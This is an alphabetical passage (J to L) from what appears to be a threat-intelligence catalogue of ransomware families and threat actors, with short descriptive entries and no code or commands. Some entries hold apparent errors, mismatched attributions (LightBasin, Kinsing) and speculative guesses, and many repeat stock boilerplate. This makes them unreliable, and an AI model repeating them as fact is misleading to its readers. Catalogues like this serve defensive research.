JSWorm is a ransomware family that first appeared in May 2019 and is notable for undergoing multiple rebrands and evolutions, later appearing under names such as Nemty, Nefilim, Offwhite, Fusion, and Milihpen. Initially, it was distributed via malicious spam emails containing JavaScript files, hence the “JS” in its name. Later versions moved to targeted intrusions, leveraging compromised RDP services and vulnerable network appliances for initial access. JSWorm encrypts files using AES-256 encryption with RSA-2048 for key protection and appends campaign-specific extensions (e.g., .JSWORM, .Nemty, .Nephilim). The group adopted a double-extortion model in its later stages, stealing data before encryption and threatening to leak it via Tor-hosted sites. Its victimology spans various sectors worldwide, including manufacturing, energy, healthcare, and professional services. The continuous rebranding suggests an effort to evade detection, disrupt attribution, and maintain pressure on victims.

Judge

ransomware

JuiceLedger

JuiceLedger is a threat actor known for infostealing through their JuiceStealer .NET assembly. They have evolved from spreading fraudulent applications to conducting supply chain attacks, targeting PyPI contributors with phishing campaigns and typosquatting. Their malicious packages contain a code snippet that downloads and executes JuiceStealer, which has evolved to support additional browsers and Discord. Victims of JuiceLedger attacks are advised to reset passwords and report any suspicious activity to security@pypi.org.

JungleSec

Uses the ccrypt encryption program (http://ccrypt.sourceforge.net/).

Juwon

ransomware

Kaandsona Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The word Kaandsona is Estonian, therefore the creator is probably from Estonia. Crashes before it encrypts.

Kaenlupuf Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

Kairos

Kairos is an extortion group that emerged with a data-leak site on 13 November 2024, claiming attacks against six organizations, primarily in the US healthcare sector. The group is financially motivated, demanding Bitcoin payments for the secure deletion of stolen files and threatening to leak data if victims do not comply. While no specific TTPs are publicly known, common techniques among extortion groups include phishing and scanning for exposed internet-facing devices. There is a potential link to a user on a Russian-language cybercriminal forum who shares a post-exploitation script, but attribution remains uncertain.

Kali

ransomware

Kamil

ransomware

Kampret

ransomware

Kangaroo Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc. From the developer behind the Apocalypse Ransomware, Fabiansomware, and Esmeralda.

Kappa

Made with OXAR builder; decryptable.

Karakurt

Karakurt actors have employed a variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.

Karkadann

Karkadann is a threat actor that has been active since at least October 2020, targeting government bodies and news outlets in the Middle East. They have been involved in watering hole attacks, compromising high-profile websites to inject malicious JavaScript code. The group has been linked to another commercial spyware company called Candiru, suggesting they may utilize multiple spyware technologies. There are similarities in the infrastructure and tactics used by Karkadann in their campaigns.

Karma Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc. Pretends to be a Windows optimization program called Windows-TuneUp.

karma

Ransomware.

Karmen Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc. RaaS, based on HiddenTear.

Karo

ransomware

Kasablanka

The Kasablanka group is a cyber-criminal organization that specifically targeted Russia between September and December 2022, using various payloads delivered through phishing emails containing socially engineered LNK files, zip packages, and executables attached to virtual disk image files.

Kasiski Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

kasseika

Kasseika is a ransomware variant first publicly reported in January 2024, identified as a new evolution of the BlackMatter/LockBit ransomware codebase. The malware appends the .kasseika extension to encrypted files and uses a double-extortion model, combining file encryption with threats to publish stolen data on a Tor-based leak site. Early analysis revealed that Kasseika shares several traits with LockBit 3.0, including encryption routines, obfuscation methods, and ransom note structure, but with modified branding and negotiation portals. Initial access vectors have not been widely confirmed, though patterns from related ransomware suggest the use of compromised credentials, RDP exploitation, and vulnerabilities in public-facing services. Victims have been observed in North America, Europe, and Asia, spanning industries like manufacturing, logistics, and professional services.

Katafrank

ransomware

Katyusha

ransomware

Kawa

Kawa is an active extortion or ransomware group tracked by RansomLook.

KawaiiLocker

Ransomware

KAX17

KAX17 is a sophisticated threat actor that has been active since at least 2017. They have operated hundreds of malicious servers within the Tor network, primarily as entry and middle points. Their main objective appears to be collecting information on Tor users and mapping their routes within the network. Despite efforts to remove their servers, KAX17 has shown resilience and continues to operate.

Kazu

Kazu is a financially motivated ransomware group known for employing a double extortion model, targeting sectors such as healthcare and government. The group has claimed responsibility for multiple high-profile breaches, including those of Manage My Health and the Defensoría del Pueblo de Colombia, exfiltrating sensitive data through techniques like exploiting unpatched vulnerabilities and credential reuse. Kazu has demanded ransoms ranging from $60,000 to $500,000, threatening public disclosure of stolen data if payments are not made. Their operations have primarily focused on entities in Latin America, Asia, and the Middle East, with a notable presence on dark web leak sites.

KCTF Locker

ransomware

KCW

ransomware

Kee

ransomware

Keksec

The threat group behind EnemyBot, Keksec, is well-resourced and has the ability to update and add new capabilities to its arsenal of malware on a daily basis (see below for more detail on Keksec)

KEKW

ransomware

KelvinSecurity

KelvinSecurity is a hacker group that has been active since at least 2015. They are known for their hacktivist and black hat activities, targeting public and private organizations globally. The group sells and leaks databases, documents, and access belonging to their victims, often on the dark web or their own platforms. They have been involved in attacks against various sectors, including telecommunications, political parties, and healthcare.

KeRanger

OS X ransomware.

Kerkoporta

ransomware

Key Group

Key Group is an active extortion or ransomware group tracked by RansomLook.

KeyBTC

Ransomware

KEYHolder

Ransomware deployed via remote attacker. Contact address: tuyuljahat@hotmail.com.

KeyMaker

ransomware

Keymous+

Keymous is a threat actor known for executing extensive DDoS attacks across multiple Arab countries, targeting government ministries and critical infrastructure. The group has claimed access to sensitive data, including over 300,000 records from Israel's Ministry of Education, and has engaged in reconnaissance activities against various ministries in Bahrain and other nations. Keymous employs diverse infrastructure, including compromised IoT devices and DDoS-for-hire platforms, to amplify attack bandwidth. Their operations have been characterized by a focus on politically motivated cyberattacks, particularly in the context of regional conflicts.

KEYPASS

A new distribution campaign is underway for a STOP Ransomware variant called KeyPass, based on the number of victims that have been seen. Unfortunately, how the ransomware is being distributed is unknown at this time.

Killada

Killada is an active extortion or ransomware group tracked by RansomLook.

KillBot_Virus

ransomware

KillDisk-Dimens

ransomware

KillDisk Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Every file is encrypted with a personal AES key, and the AES key is then encrypted with an RSA-1028 key. Attributed to TeleBots (Sandworm). Goes under a fake name: Update center or Microsoft Update center.

KillerLocker

Ransomware. Possibly a Portuguese developer.

Killnet

A group targeting various countries using denial-of-service attacks.

KillRabbit

ransomware

Killsec

Killsec is an active extortion or ransomware group tracked by RansomLook.

killsec3

killsec3 is an active extortion or ransomware group tracked by RansomLook.

KillSwitch

ransomware

KimcilWare

Ransomware targeting websites only.

Kindest

ransomware

KingOuroboros

This crypto-extortioner encrypts user data using AES and then demands a $30, $50 or $80 ransom in BTC to return the files. The name is original. Written in AutoIt.

Kinsing

This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.

Kirk Ransomware & Spock Decryptor

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc. Payments in Monero.

Kirov

Kirov is an active extortion or ransomware group tracked by RansomLook.

Kiss-a-Dog

CrowdStrike identified a cryptojacking campaign targeting vulnerable Docker and Kubernetes infrastructure. Called “Kiss-a-dog,” the campaign targets Docker and Kubernetes infrastructure using an obscure domain from the payload, container escape attempt and anonymized “dog” mining pools.

Kittykatkrew

Kittykatkrew is an active extortion or ransomware group tracked by RansomLook.

KKK

ransomware

Knight

Knight is a Ransomware-as-a-Service (RaaS) operation first observed in August 2023, believed to be a rebrand or evolution of the Cyclops ransomware family. The ransomware targets both Windows and Linux/ESXi systems, encrypting files with strong symmetric and asymmetric cryptography and appending the .knight extension. Knight affiliates employ a double-extortion model, stealing sensitive data before encryption and threatening to leak it via a Tor-based site. Distribution methods include phishing campaigns delivering malicious attachments, exploitation of vulnerabilities in public-facing services, and use of previously compromised credentials. The ransomware is modular, allowing affiliates to deploy only the components needed for a given environment, and has been used in attacks on healthcare, manufacturing, finance, and technology sectors across North America, Europe, and Asia. Knight’s leak site lists victims with partial data dumps to pressure payment, escalating to full leaks if negotiations fail.

Knot

ransomware

KoKoKrypt Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread by its creator in forums. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files and documents and more. The ransom is 0.1 bitcoins within 72 hours. Uses Windows Update as a decoy. Creator: Talnaci Alexandru.

Kolobo Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

Kontoret för särskild inhämtning

Office for Special Acquisition – Kontoret för särskild inhämtning (KSI)

Koolova Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The hacker of this ransomware tends to make lots of spelling errors in his requests. Has Italian text and only targets the Test folder on the user's desktop.

Korean

Ransomware. Based on HiddenTear.

Kostya Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

Kovter

ransomware

Kozy.Jozy

Ransomware. Potential kit. Contact addresses: selectedkozy.jozy@yahoo.com kozy.jozy@yahoo.com unlock92@india.com

Kraken Cryptor Ransomware

The Kraken Cryptor Ransomware is a newer ransomware that was released in August 2018. A new version, called Kraken Cryptor 1.5, was recently released that is masquerading as the legitimate SuperAntiSpyware anti-malware program in order to trick users into installing it.

Kraken Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The hacker requests 2 bitcoins in return for the files.

kraken

Kraken leak blog (hellokitty)

KratosCrypt

Ransomware. Contact address: kratosdimetrici@gmail.com.

KRider Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

Kriptovor

ransomware

KromSec

KromSec is a hacktivist group that claims to be composed of hackers, activists, writers, and journalists. The group has been involved in a number of high-profile cyberattacks, including a cyber offensive against Iran in September 2022 and the sale of the database of the Iran Ministry of Industries and Mines on a hacker forum in November 2023. KromSec's attacks have been met with mixed reactions, but the group has quickly made a name for itself as a significant threat to governments and organizations around the world.

Krybit

Krybit is a ransomware group that operates as a ransomware-as-a-service provider, offering affiliates 80% of ransom proceeds in exchange for technical support and a malware suite. The group has claimed attacks on various organizations across multiple countries, including asesoriauriel.com and fraper.com, both in Spain, without disclosing the volume of data exfiltrated. Krybit is currently engaged in a turf war with another group, 0APT, and has been accused of fabricating victim claims. Their leak site has been used to publish compromised data and to issue threats to rivals and victims alike.

Krypt

Krypt is an active extortion or ransomware group tracked by RansomLook.

Krypte

ransomware

Kryptina

Kryptina is an active extortion or ransomware group tracked by RansomLook.

KryptoLocker

Ransomware. Based on HiddenTear.

Kryptonite RBY

ransomware

Kryptonite Snake

ransomware

Kryptos

Kryptos is an active ransomware-as-a-service operation tracked by RansomLook.

Kuiper

Kuiper is a relatively new ransomware strain first analyzed in April 2023, notable for being written in Rust and designed to target multiple platforms, including Windows, Linux, and ESXi environments. The ransomware encrypts files with ChaCha20 symmetric encryption, securing keys with Curve25519, and appends the .kuiper extension to affected files. Kuiper operates under a double-extortion model, exfiltrating data before encryption and threatening to leak it on a Tor-hosted site if the ransom is not paid. Initial infection vectors are not widely documented, but analysis suggests potential use of compromised credentials, phishing, or exploitation of exposed services. The ransomware contains evasion techniques such as process termination, shadow copy deletion, and targeting of backup files to hinder recovery. Public reporting on Kuiper remains limited, indicating it may be in an early operational stage or used by a small number of actors.

Kupidon

ransomware

Kurdistan Region Security Council

Kurdistan Region Security Council (KRSC) - (Regional security agency)

Kuza

Kuza is an active extortion or ransomware group tracked by RansomLook.

Kyber

Kyber is an active extortion or ransomware group tracked by RansomLook.

L33TAF Locker Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar vectors. It encrypts all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. The ransom is 0.5 bitcoins. The creator goes by the name staffttt, who also created Fake CryptoLocker.

La Piovra

La Piovra is an active extortion or ransomware group tracked by RansomLook.

LabHost

LabHost is a threat actor group targeting Canadian Banks with Phishing-as-a-Service attacks. They have been observed using tools like LabRat and LabSend for real-time campaign management and SMS lures. LabHost's phishing campaigns have similarities to Frappo campaigns, but they operate separately and offer different subscription packages.

Ladon

ransomware

Lahav 433

Lahav 433 (Police intelligence)

Lalabitch_ransomware

ransomware

Lamashtu

Lamashtu is an active extortion or ransomware group tracked by RansomLook.

Lambda

Lambda is an active extortion or ransomware group tracked by RansomLook.

LambdaLocker Ransomware

It targets English- and Chinese-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar vectors. It encrypts all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. Written in Python.

Lamialocker

Lamialocker is an active extortion or ransomware group tracked by RansomLook.

Lancefly

Lancefly targets government, aviation, and telecom organizations in South and Southeast Asia. They use a custom backdoor named Merdoor, developed since 2018, and employ various tactics to gain access, including phishing emails, SSH credential brute-forcing, and exploiting server vulnerabilities. Additionally, Lancefly has been observed using a newer version of the ZXShell rootkit and tools like PlugX and ShadowPad RAT, which are typically associated with Chinese-speaking APT groups.

LandSlide

ransomware

LanRan

Ransomware. Variant of the open-source MyLittleRansomware.

Larva-208

LARVA-208 is a financially motivated threat actor employing sophisticated phishing campaigns to harvest credentials and deploy ransomware. The actor uses multiple tactics, including Open URL Redirection, fake login pages, and social engineering, to bypass MFA and gain access to corporate networks. LARVA-208 has compromised over 618 organizations since June 2024, often deploying ransomware payloads. The threat actor is linked to LARVA-148, a threat actor managing domain acquisitions and attacks.

Larva-24005

Larva-24005 is a threat actor that breaches servers in Korea to establish a web server and PHP environment for phishing attacks, primarily targeting individuals involved with North Korea and university professors researching the regime. They exploit the BlueKeep vulnerability for initial access and utilize RDPWrap and a custom keylogger post-compromise. Phishing emails are crafted to appear as legitimate communications, often containing malicious URLs or compressed files. The actor has been observed storing phishing pages in the IIS_USER account and XAMPP home folder, although traces of these pages were later deleted.

Larva-24010

The Larva-24010 threat actor is distributing malware through the website of a Korean VPN service provider. As a result, when a user downloads and runs the installer from the VPN website, malware can be installed on the system. Since at least 2023, the Larva-24010 threat actor has been targeting Korean VPN users to spread malware, ultimately installing various backdoors such as MeshAgent, gs-netcat, and NKNShell. Through this, the attacker can control infected systems where the VPN is installed and steal sensitive information stored on those systems.

Larva-25012

Larva-25012 is a threat actor known for deploying Proxyware, utilizing malware disguised as a Notepad++ installer. The actor injects Proxyware into the Windows Explorer process and employs Python-based loaders to evade detection. They distribute Proxyware installers primarily through advertisements on websites offering free YouTube video downloads and fake sites for cracked software. Larva-25012 has been active since at least 2024, distributing multiple types of Proxyware, including DigitalPulse, Honeygain, and Infatica.

Larva-26002

Larva-26002 targets improperly managed MS-SQL servers, gaining access through weak credentials via brute-force and dictionary attacks. The actor has distributed Trigona and Mimic ransomware, utilizing the Bulk Copy Program for exploitation and installing remote access tools like AnyDesk and Teramind. In their attacks, they also deploy scanner malware, including ICE Cloud Client written in Go and a Rust-based scanner. After compromising systems, they execute commands to gather information about the infected environment.

late.lol

Affiliates:
@Mr.C
@Empathy
@jayze
@Widow
@Memory

LazagneCrypt

ransomware

Lazarus Group

Lazarus Group is a North Korean state-sponsored cyber threat group attributed to the Reconnaissance General Bureau (RGB). [US-CERT HIDDEN COBRA June 2017](https://www.us-cert.gov/ncas/alerts/TA17-164A) [Treasury North Korean Cyber Groups September 2019](https://home.treasury.gov/news/press-releases/sm774) Lazarus Group has been active since at least 2009 and is reportedly responsible for the November 2014 destructive wiper attack on Sony Pictures Entertainment, identified by Novetta as part of Operation Blockbuster. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. [Novetta Blockbuster](https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf) North Korea’s cyber operations have shown a consistent pattern of adaptation, forming and reorganizing units as national priorities shift. These units frequently share personnel, infrastructure, malware, and tradecraft, making it difficult to attribute specific operations with high confidence. Public reporting often uses “Lazarus Group” as an umbrella term for multiple North Korean cyber operators conducting espionage, destructive attacks, and financially motivated campaigns. [Mandiant DPRK Laz Org Breakdown 2022](https://cloud.google.com/blog/topics/threat-intelligence/mapping-dprk-groups-to-government/) [Mandiant DPRK Groups 2023](https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023) [JPCert Blog Laz Subgroups 2025](https://blogs.jpcert.or.jp/en/2025/03/classifying-lazaruss-subgroup.html)

Lcryptorx

Lcryptorx is an active extortion or ransomware group tracked by RansomLook.

Leak Bazaar

Leak Bazaar is an active extortion or ransomware group tracked by RansomLook.

Leakeddata

Leakeddata is an active extortion or ransomware group tracked by RansomLook.

leaknet

In the cyber-undergrounds, we're exploring the shadowed corridors of the digital world in search of inside information. We're a digital watchdog operating at the intersection of cybersecurity, internet freedom, and investigative journalism. We delve into the hidden corners of the web, exposing truths and uncovering stories that are often buried by mainstream media or distorted by corporate interests.

This project isn’t just for tech experts or privacy advocates. It’s for everyone who values transparency, freedom, and integrity in a connected world. Operating independently, we’re free from corporate influence and political bias, enabling us to report with uncompromising honesty. Our work resonates with a diverse audience: cybersecurity experts, digital rights activists, journalists, and anyone who values an internet free from control.

In a world where the lines between truth and agenda grow increasingly blurred, we’re building something bold: a space where the truth of the internet can be uncovered, untamed and unfiltered. Our project is an independent voice for digital freedom, committed to shining a light on the internet’s most vital and vulnerable spaces: cybersecurity, privacy, and the right to information without compromise.

In a landscape clouded by agendas and profit, we are here to do one thing: deliver the truth, boldly and beautifully. Join us as we push back against the systems that seek to compromise our digital freedoms and carve a path toward a more transparent, liberated internet.

Leakthemall

ransomware

Lebanese State Security

Lebanese State Security

LeChiffre

Ransomware. Encrypts the first 0x2000 and last 0x2000 bytes of each file. Deployed via a remote attacker.

Libyan Scorpions

Libyan Scorpions is a malware operation in use since September 2015, operated by a politically motivated group whose main objective is intelligence gathering: spying on influential and political figures and running an espionage campaign within Libya.

Lick

Ransomware. Variant of Kirk.

LickyAgent

ransomware

Lifting Zmiy

Rostelecom's security team has discovered a new APT group that is breaching companies via industrial PLCs. Named Lifting Zmiy, the group's first attacks were traced back to October 2023. The group targeted PLCs from Russian company Tech-Automatics usually used with elevators and which were still using their default passwords. Rostelecom has linked the group to intrusions at a Russian government contractor, two telecom operators, and an IT company. The company says the group collected and exfiltrated data and then destroyed the victim's infrastructure. Rostelecom says Lifting Zmiy uses Starlink infrastructure for attacks and appears to operate out of Eastern Europe.

Light

ransomware

LightBasin

UNC1945 is an APT group that has been targeting telecommunications companies globally. They use Linux-based implants to maintain long-term access in compromised networks. UNC1945 has demonstrated advanced technical abilities, utilizing various tools and techniques to evade detection and move laterally through networks. They have also been observed targeting other industries, such as financial and professional consulting, and have been linked to other threat actors, including Mustang Panda and RedDelta.

LightningCrypt

ransomware

LIGMA

ransomware

Lilac Typhoon

Lilac Typhoon is a threat actor attributed to China. They have been identified as exploiting the Atlassian Confluence RCE vulnerability CVE-2022-26134, which allows for remote code execution. This vulnerability has been used in cryptojacking campaigns and is included in commercial exploit frameworks. Lilac Typhoon has also been involved in deploying various payloads such as Cobalt Strike, web shells, botnets, coin miners, and ransomware.

LilacSquid

LilacSquid is an APT actor targeting a variety of industries worldwide since at least 2021. They use tactics such as exploiting vulnerabilities and compromised RDP credentials to gain access to victim organizations. Their post-compromise activities involve deploying MeshAgent and a customized version of QuasarRAT known as PurpleInk to maintain control over infected systems. LilacSquid has been observed using tools like Secure Socket Funneling for data exfiltration.

Lilith

Lilith is an active extortion or ransomware group tracked by RansomLook.

Lime

ransomware

LIMINAL PANDA

LIMINAL PANDA is a China-nexus APT that targets telecommunications entities, employing custom malware and publicly available tools for covert access, C2, and data exfiltration. The adversary demonstrates extensive knowledge of telecom networks, utilizing GSM protocols to retrieve mobile subscriber information and call metadata. LIMINAL PANDA exploits trust relationships and security gaps between providers to access core infrastructure, indicating a focus on SIGINT collection rather than financial gain. Their intrusion activity has primarily affected telecom providers in southern Asia and Africa, with potential for broader targeting based on network configurations.

LinkC Pub

Linkc is a newly emerged ransomware group that operates an onion-based data leak site and has claimed one victim, a U.S.-based AI and cloud service provider, H2O.ai, which was attacked on January 29, 2025. The group demanded a ransom of $15 million for data decryption and removal, showcasing access to sensitive information, including GPT model source code and customer data. Linkc's DLS is well-constructed and quick to load, indicating potential for future victim listings. However, there is currently no public acknowledgment from the victim, and the group has not engaged in discussions on cybercrime forums.

Linux.Encoder

Ransomware. Targets Linux.

Litra

ransomware

LittleFinger

ransomware

LK Encryption

Ransomware. Based on HiddenTear.

LLTP Locker

Ransomware. Targets Spanish-speaking victims.

LMAOxUS

ransomware

Lock2017 Ransomware

This most likely affects English-speaking users, since the ransom note is written in English; as English is understood worldwide, anyone can be harmed. The attacker spreads the malware via email spam, fake updates and malicious attachments. All user files are compromised, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

Lock93 Ransomware

This most likely affects English-speaking users, since the ransom note is written in English; as English is understood worldwide, anyone can be harmed. The attacker spreads the malware via email spam, fake updates and malicious attachments. All user files are compromised, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

LockBit Ransomware Actors & Affiliates

This object represents the LockBit Ransomware-as-a-Service ("RaaS") apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects. Ransomware labeled "LockBit" was first observed in 2020. LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency ("CISA"), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware's predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (March 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] Since emerging in 2020, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world. In June 2023, the U.S. Federal Bureau of Investigation reported it had identified 1,700 LockBit attacks since 2020.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (576 associated with the LockBit 2.0 variant and 394 associated with LockBit 3.0), the most of any extortion threat that year. 
Through April 2023, LockBit had claimed 406 victims, more than double the number of the next threat (Clop, with 179 victims).[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] CISA reported in June 2023 that U.S. ransoms paid to LockBit since January 2020 totaled $91 million.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)] LockBit affiliate operators are known to use a wide variety of techniques during their attacks. Initial access for LockBit infections has occurred via most methods (including a number of vulnerability exploits), and operators are known to abuse a range of free and open-source software tools for a variety of post-exploitation activities. In addition to victim data encryption, LockBit actors routinely exfiltrate victim data and threaten to leak this data for extortion purposes. **Related Vulnerabilities**: CVE-2021-22986, CVE-2023-0669, CVE-2023-27350, CVE-2021-44228, CVE-2021-22986, CVE-2020-1472, CVE-2019-0708, CVE-2018-13379[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]

LockBit

LockBit is a ransomware-as-a-service operation known for its fast encryption and double extortion tactics.

LockBox

ransomware

LockCrypt

LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional. Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don’t take much time preparing the attack or the payload. Instead, they’re rather focused on a fast and easy gain, rather than on creating something for the long run. Because of this, they could easily be defeated.

Lockdata

Lockdata is an active extortion or ransomware group tracked by RansomLook.

Locked_File

ransomware

Locked-In Ransomware or NoValid Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar vectors. It encrypts all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. Based on RemindMe.

LockedByte

ransomware

Lockedv1

ransomware

Locker-Pay

ransomware

Locker

Ransomware. Has a GUI.

Lockergoga

Lockergoga is an active extortion or ransomware group tracked by RansomLook.

Lockify

ransomware

LockLock

Ransomware

LockMe

ransomware

LockOn

ransomware

Lockout

ransomware

Locky

Ransomware. Affiliated with the Dridex and Necurs botnets.

Locus

Locus is an active extortion or ransomware group tracked by RansomLook.

LofyGang

LofyGang has been found to be linked to more than 200 malicious packages, with thousands of installations throughout 2022. The group, believed to have been operating for more than a year, has multiple hacking objectives, including stealing credit card information and stealing user accounts including Discord Inc. premium accounts, streaming services accounts such as Disney+ and Minecraft accounts.

Loki

ransomware

Lokilocker

Lokilocker is an active extortion or ransomware group tracked by RansomLook.

LolKek

ransomware

Lolnek

Lolnek is an active extortion or ransomware group tracked by RansomLook.

Lomix Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar vectors. It encrypts all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. Based on the idiotic open-source ransomware called CryptoWire.

Longhorn

Longhorn has been active since at least 2011. It has used a range of backdoor Trojans in addition to zero-day vulnerabilities to compromise its targets. Longhorn has infiltrated governments and internationally operating organizations, in addition to targets in the financial, telecoms, energy, aerospace, information technology, education, and natural resources sectors. All of the organizations targeted would be of interest to a nation-state attacker. Longhorn has infected 40 targets in at least 16 countries across the Middle East, Europe, Asia, and Africa. On one occasion a computer in the United States was compromised but, following infection, an uninstaller was launched within hours, which may indicate this victim was infected unintentionally. According to CFR, this threat actor compromises governments, international organizations, academic institutions, and financial, telecommunications, energy, aerospace, information technology, and natural resource industries for espionage purposes. Some of the tools used by this threat actor were released by WikiLeaks under the name "Vault 7."

LongNosedGoblin

LongNosedGoblin is a China-aligned APT group targeting governmental entities in Southeast Asia and Japan for cyberespionage. The group employs Group Policy for malware deployment and utilizes cloud services like Microsoft OneDrive and Google Drive as C&C servers. Their operations feature a modular malware ecosystem, including backdoors, browser data stealers, and PowerShell-based downloaders that execute multi-stage payloads in memory. LongNosedGoblin's tactics emphasize reconnaissance-driven targeting and the abuse of trusted enterprise mechanisms, allowing for stealthy persistence within compromised networks.

LongTermMemoryLoss

ransomware

LonleyCrypt

ransomware

LooCipher

ransomware

LordOfShadow

ransomware

Lorenz Ransomware

Lorenz is a ransomware group that has been active since at least February 2021 and like many ransomware groups, performs double-extortion by exfiltrating data before encrypting systems.

lorenz

Tesorion describes Lorenz as a ransomware with design and implementation flaws that make decryption with the attackers' own tools impossible. A free decryptor for the 2021 versions was made available via the NoMoreRansom initiative. A new version of the malware was discovered in March 2022, for which a free decryptor was again provided, while the ransomware operators remain unable to provide tools to decrypt affected files.

Lortok

Ransomware

Losers-Dangerous

ransomware

Losers

ransomware

Lost_Files

ransomware

Losttrust

Losttrust is an active extortion or ransomware group tracked by RansomLook.

LOTUS PANDA

Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia.

LoveLock Ransomware or Love2Lock Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar vectors. It encrypts all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

LoveServer Ransomware

It targets English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar vectors. It encrypts all user files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files. This attacker requests your IP address in return for the decryption.

LowLevel04

Ransomware. Prepends filenames.

Lsd

Lsd is an active extortion or ransomware group tracked by RansomLook.

LuciferCrypt

ransomware

Luckbit

Luckbit is an active extortion or ransomware group tracked by RansomLook.

Lucky Cat

